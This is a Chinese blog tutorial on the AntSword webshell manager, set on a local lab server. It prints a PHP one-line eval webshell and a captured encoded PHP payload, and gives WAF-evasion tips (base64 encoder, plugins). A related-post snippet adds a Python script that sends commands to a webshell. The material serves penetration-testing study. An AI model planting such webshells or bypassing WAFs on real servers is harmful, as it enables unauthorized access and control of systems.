中国蚁剑安装使用教程

最新推荐文章于 2025-06-05 18:20:11 发布
最新推荐文章于 2025-06-05 18:20:11 发布
阅读量1.9w 收藏 227
点赞数 54
CC 4.0 BY-SA版权
分类专栏: 渗透工具安装使用 文章标签: php 服务器 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/129782649
本文是中国蚁剑的详细使用教程,包括安装、连接木马、设置代理和参数,以及如何通过编码、插件和修改蚁剑来绕过WAF。教程适合安全测试人员和网站管理员参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

中国蚁剑安装使用教程

大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起

前言

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

一、中国蚁剑安装

中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it

中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用

二、中国蚁剑使用

2.1中国蚁剑连接木马

我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.129/muma.php

在这里插入图片描述

如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:

在这里插入图片描述

2.2中国蚁剑设置代理

  1. 首先点击设置

在这里插入图片描述

  1. 进行相应的配置

在这里插入图片描述
在这里插入图片描述

  1. 配置正确点击测试连接就可以进行抓包

    点击正上方的测试连接

在这里插入图片描述

2.3中国蚁剑参数设置

如下所示,是http包的相应的参数

POST /muma.php HTTP/1.1
Host: 192.168.93.129:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 983
Connection: close

1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:

在这里插入图片描述

在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:

在这里插入图片描述

2.4中国蚁剑其他使用

在这里插入图片描述

三、 中国蚁剑绕过Waf

3.1 编码绕过WAF

在这里插入图片描述

设置不同的编码器和解码器可以绕过waf,如下所示:

我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)

在这里插入图片描述

开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:

  • 开启安全狗

在这里插入图片描述

基本上开启了waf,你就很难进行连接了,触发waf版本很老

3.2插件绕过waf

在这里插入图片描述

如上所示,点击插件市场,进行插件下载

在这里插入图片描述

由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试

3.3 修改蚁剑绕过WAF

如下文章,是比较好的绕过waf的手段

蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)

总结

如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF

中国的下载与使用(关于upload靶场)后续更新upload过关
m0_74540090的博客
04-23 3219
文件名:antSword.zip链接:提取码:8888下载以后解压,比如放在。
中国安装教程
xuhc25的博客
06-20 771
1、将文件解压: 在GitHub下载时需要下载两个部分, 一个是项目核心源码(AntSword),另一个是加载器(AntSword-Loader); 加载器则分为三个版本:Mac、Windows、Linux。 2、打开加载器: AntSword-Loader 3、初始化: 选择工作目录 然后重启即可。 ...
中国-antSword
lin__ying的博客
12-28 1693
是一款开源的跨平台Webshell管理工具,它是一个开源的远程管理工具,主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。提供了一个图形化界面,可以通过简单的操作连接和控制目标设备或系统。具有以下特点:1.支持多种操作系统:支持多种操作系统,包括Windows、Linux、MacOS等,因此具有很好的跨平台性能。2.功能丰富:具有文件管理器、进程管理器、主机信息查看器、端口转发等多种功能,为用户提供了全面的远程管理服务。
WIN10系统下载安装中国程序的过程
最新发布
qq_37399422的博客
06-05 498
中国安装指南:首先下载Windows版AntSword-Loader加载器(约59M)和核心源码。解压后运行程序,选择空文件夹初始化时会自动下载antSword-master压缩包。若遇解压错误,需手动解压该压缩包到初始化文件夹。最后重新选择该文件夹即可成功运行。关键步骤包括处理初始化报错,通过管理员权限或手动解压方式解决文件缺失问题。
攻防兼备:中国使用指南及特征流量
ZL_1618的博客
03-06 5960
这款工具在流量加密上特征比较明显,而且返回包多是明文,很容易在流量上就被查杀。!!接下来我将给各位同学划分一张学习计划表!
中国使用教程.zip
12-12
中国使用教程.zip 中国采用了Electron作为外壳,ES6作为前端代码编写语言 利用js调用shell执行XSS代码
中国(AntSword)安装使用教程
热门推荐
alert['Hello World']
08-24 12万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
中国(antSword)下载、安装使用教程
qq_46603839的博客
04-29 9866
antsword
网安工具系列:中国安装和入门
01-05
教程将详细讲解如何安装和入门使用中国。 首先,我们来看安装过程。安装中国之前,我们需要确保电脑上已经安装了必要的环境。这里提供的`7z2301-x64.exe`是一个7-Zip的压缩软件,它是解压`AntSword-...
4.0.3安装包,附带安装教程
06-01
4.0.3安装包,附带安装教程
中国2.1.9_内含源码和加载器.rar
11-19
中国是一款开源的Web渗透测试工具,以其高效、便捷的操作方式受到许多网络安全专业人士的青睐。版本2.1.9是该工具的一个迭代更新,它提供了更多的功能和优化,以帮助用户更好地进行网站的安全测试。加载器v4.0.3...
中国源码antSword-2.1.9.zip
09-17
中国(AntSword)是一款开源的安全工具,主要用于网络安全测试和Web应用的渗透测试。在本案例中,我们讨论的是其2.1.9版本的源码。这个压缩包"antSword-2.1.9.zip"包含了项目在该版本的所有源代码,用户可以...
【亲测免费】 中国(AntSword)使用教程
gitblog_00219的博客
08-07 2354
中国(AntSword)使用教程 项目介绍 中国(AntSword)是一款跨平台的开源网站管理工具,旨在满足渗透测试人员的需求。它是一个功能强大的工具,可以帮助用户管理和操作远程服务器。AntSword 支持多种操作系统,包括 Windows、Linux 和 macOS。 项目快速启动 安装 克隆项目仓库: git clone https://github.com/AntSwordPr...
(antSword)的使用
2301_80085755的博客
10-26 5104
一.获取
中国 安装教程 2024年5月
YueXuan_521的博客
06-10 2124
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 win32-x64”的加载器文件夹,然后启动该文件夹内的AntSword.exe应用程序。前往“Windows防护中心”–>“保护历史记录”,选择“操作”中的“还原”,就可以解决问题。三、假如依照指示,用户选定一个空白目录来进行初始化操作,系统将自动执行源代码的下载任务。不过,我们已经将源代码下载好了,选择源代码的文件夹路径。下载中国的核心源码时,可能因为检测到病毒无法下载,或文件被防火墙删除。
中国安装-保姆级教程
qq_60450539的博客
05-02 6535
中国安装-保姆级教程
使用教程
Vincent0sen的博客
09-14 1744
使用介绍
中国使用教程
05-05
### 关于中国 (AntSword) 的使用教程 #### 安装过程 中国是一款开源的跨平台 Webshell 管理工具,适用于合法授权的安全测试人员和网站管理员。其安装过程相对简单,支持 Windows、Linux 和 macOS 平台。 1. **下载文件**: 需要分别下载项目核心源码 (`antSword`) 和加载器 (`loader`)[^4]。加载器提供了不同操作系统对应的版本。 2. **解压并运行**: 将 `AntSword-Loader-vX.X.X-os-version.zip` 解压缩到目标目录后,双击可执行文件(如 `AntSword.exe`),等待初始化完成后再重新启动程序即可正常使用[^4]。 --- #### 基本配置与连接设置 在成功安装之后,可以通过以下步骤创建一个新的会话来管理远程服务器上的 Webshell: 1. 打开软件界面,在左侧导航栏点击“新建站点”按钮。 2. 输入目标 URL 地址以及上传路径等相关参数。例如: - **URL**: http://example.com/shell.php - **密码**: 如果存在加密机制,则需填写正确的密钥或密码。 3. 设置编码方式和其他高级选项(如果必要的话)[^3]。 --- #### 功能模块介绍 中国不仅提供基本的命令执行功能,还集成了许多实用特性以增强用户体验: - 文件管理:允许浏览、编辑甚至删除远端主机中的任意文件; - 数据库交互:能够直接查询 MySQL 或其他类型的数据库表单数据; - 终端模拟器:内置 SSH/Telnet 支持以便更高效地控制 Linux 服务端实例; - 插件扩展:通过第三方插件进一步扩充应用范围[^2]。 以下是实现某些特定任务时可能需要用到的一些 Python 脚本片段作为示例展示如何调用 API 接口自动化处理流程的一部分逻辑代码: ```python import requests def send_command(url, password, command): payload = {'password': password, 'cmd': command} response = requests.post(url, data=payload) return response.text if __name__ == "__main__": url = "http://target-site/web-shell-path" passwd = "your-webshell-password" cmd = "whoami" result = send_command(url, passwd, cmd) print(result.strip()) ``` 此脚本发送 POST 请求给指定的目标地址,并附带所需的身份验证凭据及待执行的具体指令字符串内容[^1]。 --- #### 注意事项 尽管该工具有助于提高工作效率,但在未经授权的情况下擅自访问他人计算机系统属于违法行为,请务必遵循当地法律法规合理运用此类技术手段[^2]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三年之约-第二年

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值